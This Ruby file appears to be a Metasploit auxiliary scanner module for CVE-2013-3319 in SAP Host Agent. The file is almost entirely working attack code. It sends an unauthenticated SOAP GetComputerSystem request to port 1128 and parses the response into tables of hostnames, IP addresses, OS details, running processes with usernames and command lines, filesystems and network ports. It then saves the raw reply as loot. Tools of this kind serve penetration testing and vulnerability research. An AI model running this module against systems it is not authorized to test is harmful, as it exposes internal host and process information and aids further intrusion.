require 'msf/core'
require 'rexml/document'
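class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # One <item> of an <mProperties> list as serialised by REXML:
  # captures (mName, mType, mValue) in that order.
  ITEM_RE = /<item><mName>(.+?)<\/mName><mType>(.+?)<\/mType><mValue>(.+?)<\/mValue><\/item>/ix

  def initialize
    super(
      'Name'        => 'SAP Host Agent Information Disclosure',
      'Description' => %q{
        This module attempts to retrieve Computer and OS info from Host Agent
        through the SAP HostControl service
      },
      'References'  =>
        [
          # General
          [ 'CVE', '2013-3319' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1816536' ],
          [ 'URL', 'http://labs.integrity.pt/advisories/cve-2013-3319/' ]
        ],
      'Author'      =>
        [
          'Bruno Morisson <bm[at]integrity.pt>'
        ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(1128)
      ], self.class)

    # 1128/tcp is the SAP Host Agent (HostControl) SOAP port.
    register_autofilter_ports([ 1128 ])
    deregister_options('RHOST')
    deregister_options('VHOST')
  end

  # Scanner entry point, invoked once per target.
  #
  # Sends a single GetComputerSystem SOAP request, prints whatever the agent
  # returns as console tables and stores the raw XML as loot.  No credentials
  # are sent: the disclosure described by the referenced CVE is precisely
  # that an unpatched Host Agent answers this request anyway.
  #
  # @param rhost [String] target address supplied by the Scanner mixin
  # @return [void] output goes to the console and to store_loot
  def run_host(rhost)
    rport = datastore['RPORT']
    print_status("Connecting to SAP Host Control SOAP Interface on #{rhost}:#{rport}")

    data = soap_request_body

    begin
      res = send_request_raw({
        # This module registers no URI option, so the path normally collapses
        # to "/" (the HostControl endpoint).  Kept as found; confirm before
        # replacing with a literal.
        'uri'     => "/#{datastore['URI']}",
        'method'  => 'POST',
        'data'    => data,
        'headers' =>
          {
            # Content-Length counts bytes; the payload is ASCII-only so the
            # value is the same as data.length, but bytesize is the right call.
            'Content-Length' => data.bytesize,
            'SOAPAction'     => '""',
            'Content-Type'   => 'text/xml; charset=UTF-8',
          }
      }, 15)
    rescue ::Rex::ConnectionError
      print_error("Unable to connect to #{rhost}:#{rport}")
      return
    end

    unless res && res.code == 200
      # A 500 is normally a SOAP fault; surface its faultstring when present.
      # Anything else (no response, other status, fault without a string)
      # is reported the same way the original did.
      if res && res.code == 500 && res.body =~ /<faultstring>(.*)<\/faultstring>/i
        print_error("#{rhost}:#{rport} - Error code: #{Regexp.last_match(1).strip}")
      else
        print_error("#{rhost}:#{rport} - Failed to parse list")
      end
      return
    end

    print_good("Got response from server, parsing...")

    # The body is attacker-controlled (it comes from the host being scanned).
    # REXML enforces an entity-expansion limit by default
    # (REXML::Security.entity_expansion_limit); leave it at the default so a
    # hostile response cannot exhaust memory here.  A body that is not
    # well-formed XML raises rather than yielding an empty document, which
    # previously escaped the method as an unhandled exception.
    begin
      mxml = REXML::Document.new(res.body)
    rescue REXML::ParseException => e
      print_error("#{rhost}:#{rport} - Failed to parse list (#{e.message})")
      return
    end

    saptbl = build_tables
    rows = collect_rows(mxml, saptbl)

    if rows.zero?
      print_error("#{rhost}:#{rport} - Failed to parse list")
      return
    end

    # rows counts table rows actually appended, i.e. the items the user
    # sees, rather than every <mProperties> node encountered.
    print_good("#{rows} items listed")
    saptbl.each { |t| print(t.to_s) }

    path = store_loot(
      "sap.getcomputersystem",
      "text/xml",
      rhost,
      res.body,
      "sap_getcomputersystem.xml",
      "SAP GetComputerSystem XML"
    )
    print_status("Response stored in: #{path}")
  end

  private

  # The GetComputerSystem SOAP envelope, byte-for-byte as the original module
  # sent it.
  #
  # NOTE(review): there is no whitespace between the SOAP-ENV and xsi
  # namespace declarations, and the session header uses `xlmns:` rather than
  # `xmlns:`.  Both are left as found: the target's parser evidently
  # tolerates them and the request is a known-good probe, so verify against
  # a live agent before "correcting" either.
  #
  # @return [String] request body
  def soap_request_body
    data = '<?xml version="1.0" encoding="utf-8"?>'
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
    data << 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">'
    data << '<SOAP-ENV:Header><sapsess:Session xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
    data << '<enableSession>true</enableSession></sapsess:Session></SOAP-ENV:Header><SOAP-ENV:Body>'
    data << '<ns1:GetComputerSystem xmlns:ns1="urn:SAPHostControl"><aArguments><item>'
    data << '<mKey>provider</mKey><mValue>saposcol</mValue></item></aArguments></ns1:GetComputerSystem>'
    data << "</SOAP-ENV:Body></SOAP-ENV:Envelope>\r\n\r\n"
    data
  end

  # The five output tables, indexed in the order collect_rows fills them:
  # 0 computer system, 1 operating system, 2 processes, 3 filesystems,
  # 4 network ports.
  #
  # @return [Array<Msf::Ui::Console::Table>]
  def build_tables
    specs = [
      [ "Remote Computer Listing",
        [ "Names", "Hostnames", "IPAddresses" ] ],
      [ "Remote OS Listing",
        [ "Name", "Type", "Version", "TotalMemSize", "Load Avg 1m", "Load Avg 5m",
          "Load Avg 15m", "CPUs", "CPU User", "CPU Sys", "CPU Idle" ] ],
      [ "Remote Process Listing",
        [ "Name", "PID", "Username", "Priority", "Size", "Pages", "CPU", "CPU Time", "Command" ] ],
      [ "Remote Filesystem Listing",
        [ "Name", "Size", "Available", "Remote" ] ],
      [ "Network Port Listing",
        [ "ID", "PacketsIn", "PacketsOut", "ErrorsIn", "ErrorsOut", "Collisions" ] ]
    ]

    specs.map do |header, columns|
      Msf::Ui::Console::Table.new(
        Msf::Ui::Console::Table::Style::Default,
        'Header'  => header,
        'Prefix'  => "\n",
        'Postfix' => "\n",
        'Indent'  => 1,
        'Columns' => columns
      )
    end
  end

  # Appends one row per recognised ITSAM object to the matching table.
  #
  # Each object arrives as an <mProperties> list of
  # <item><mName/><mType/><mValue/></item> triples.  The original module does
  # not walk the tree: it serialises each list back to text, regex-scans it,
  # discards the triples whose text mentions "ITSAM" (the type markers) and
  # keeps the remaining mValues in document order.  The column positions
  # picked below depend on that order and are kept as found.
  #
  # @param mxml [REXML::Document] parsed GetComputerSystem response
  # @param saptbl [Array<Msf::Ui::Console::Table>] tables from build_tables
  # @return [Integer] number of rows appended across all tables
  def collect_rows(mxml, saptbl)
    rows = 0

    # The computer-system summary is found via the unqualified search; the
    # case check restricts it to the ITSAMComputerSystem object.
    mxml.elements.to_a("//mProperties/").each do |node|
      triples = node.to_s.scan(ITEM_RE)
      # scan returns [] on no match; the original's `if env` was always true
      # and so counted empty nodes as items.
      next if triples.empty?
      next unless triples.to_s =~ /ITSAMComputerSystem/

      v = item_values(triples)
      saptbl[0] << [ v[0], v[1], v[2] ]
      rows += 1
    end

    # All other objects are nested one level down, under <item><mProperties>.
    mxml.elements.to_a("//item/mProperties/").each do |node|
      # Some items carry no <mValue>; splice in a placeholder so the regex
      # still yields a triple and the value positions stay aligned.
      body = node.to_s.gsub(/\/mType><\/item/, "\/mType><mValue>(nil)<\/mValue><\/item")
      triples = body.scan(ITEM_RE)
      next if triples.empty?

      v = item_values(triples)
      # Percent columns are interpolated rather than concatenated so a short
      # value list yields "%" instead of raising NoMethodError on nil.
      row =
        case triples.to_s
        when /ITSAMOperatingSystem/
          [ 1, [ v[0], v[1], v[2], v[8], v[11], v[12], v[13], v[17],
                 "#{v[18]}%", "#{v[19]}%", "#{v[20]}%" ] ]
        when /ITSAMOSProcess/
          [ 2, [ v[0], v[1], v[2], v[3], v[4], v[5], "#{v[6]}%", v[7], v[8] ] ]
        when /ITSAMFileSystem/
          [ 3, [ v[0], v[2], v[3], v[4] ] ]
        when /ITSAMNetworkPort/
          [ 4, [ v[0], v[1], v[2], v[3], v[4], v[5] ] ]
        end
      next unless row

      saptbl[row[0]] << row[1]
      rows += 1
    end

    rows
  end

  # mValue of every triple whose text does not mention ITSAM, in document
  # order.  Triples that do mention it are the object-type markers, not data.
  #
  # @param triples [Array<Array<String>>] ITEM_RE matches
  # @return [Array<String>]
  def item_values(triples)
    triples.reject { |m| m.to_s =~ /ITSAM/ }.map { |m| m[2].to_s }
  end
end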
